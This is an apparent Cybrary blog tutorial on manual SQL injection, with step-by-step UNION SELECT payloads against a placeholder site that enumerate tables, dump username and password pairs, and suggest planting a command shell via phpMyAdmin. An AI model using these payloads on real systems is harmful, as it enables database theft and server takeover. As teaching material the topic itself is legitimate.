Home 0P3N Blog Guide: How to Manually Perform SQL Injection with UNION SELECT
Ready to Start Your Career?
Create Free Account
By: Kevin Mark
August 11, 2015

Guide: How to Manually Perform SQL Injection with UNION SELECT

By: Kevin Mark
August 11, 2015
By: Kevin Mark
August 11, 2015
Guide: How to Manually Use SQL Injection with UNION SELECT - CybraryThis is not shared with you so that you'll go out now and do something illegal. I want you to read this and learn to actually train and do this on your own or use with others that have given you a thumbs up to try it out.Hello to all of you and welcome to another contribution. This time, I'll share how to manually perform SQL Injection using the UNION SELECT method. For all of you that are doing SQL Injection and using open sources, software or whatever doing the work for you: if you don't already know how to manually do SQL Injection, it's time for you to learn it. Nothing is easy; there's still a lot of things to remember. So, like everyone else, take notes to remember this because.

Our target today is: https://target.com/index.php?id=5

We want to find out if our target if vulnerable to SQL. Let's check if an MYSQL errors come up when we're adding a ( ' ) into the syntax: https://target.com/index.php?id=5...And it did!

You have an error in your SQL syntax; check the manual that corresponds to your..... Continued

So, it's time to make sure we actually can work this out like we want. We're going to work with "ORDER BY" - the order by helps us to find out how many columns there are. Let's start out with adding 5 - at the start - to see if it goes all normal or an error comes up when adding too many.
  • https://target.com/index.php?id=5 ORDER BY 5-- (it still looks all normal here; let's increase the number 5 more.)
  • https://target.com/index.php?id=5 ORDER BY 10-- (oops, something happened here; it comes up with this error...)

Unknown column '10' in 'order clause'Unknown column '10' in 'order clause'

Alright, so instead of trying to add 10, we're going to add 9-- for example, and whoops, the error disappears. Now know there's 9 columns on our target. It's time to take it to another step, since we know the columns. We want to know which one we're going to inject into. In that vein, we're going to work with UNION SELECT.
  • https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9-- (Something came up, some numbers, it's easy here! There are small numbers/normal numbers and ones that are different; the number that's bold.
53
We know the column we're going to work with here is 5. So, let's inject it now by doing following:
  • https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables

CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS

You will see much more than this. It's different from what you see - but one thing is one hundred; you're inside. Now, we want to go even further with this. We want to see our valuable stuff. So that we can actually see some stuff to work with, we're going to type:
  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()--

ID,USERNAME,LIST,PASSWORD,MAIL,LINKS,.......

And, if it's even worse, PHPMYADMIN, MYSQL, CREDITCARDS, PSN and such can be there also. It's a very dangerous situation for the target. We have now decided that we want to get the USERNAME:PASSWORD from our target.
  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 from database--

administrator:badsecurity

This target has a plaintext password ups, so dumb! In other situations, you'll see the password normally in a MD5 Hash and some others are encrypted. We now have the username:password. Let's find the administration login and use it. If the target has PHPMYADMIN there, it was just about to actually find the PHPMYADMIN Panel. From there, you can do something very dangerous also by adding a CMD Shell. Then, you can actually upload another shell with more features.

As a little extra I uploaded a pastebin to show you some additional methods than just UNION SELECT (but now in a tutorial, just an overview).

http://pastebin.com/ASmH7LRj

 Any questions, feel free to PM me! Image Credit: @infosectdk
Request Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry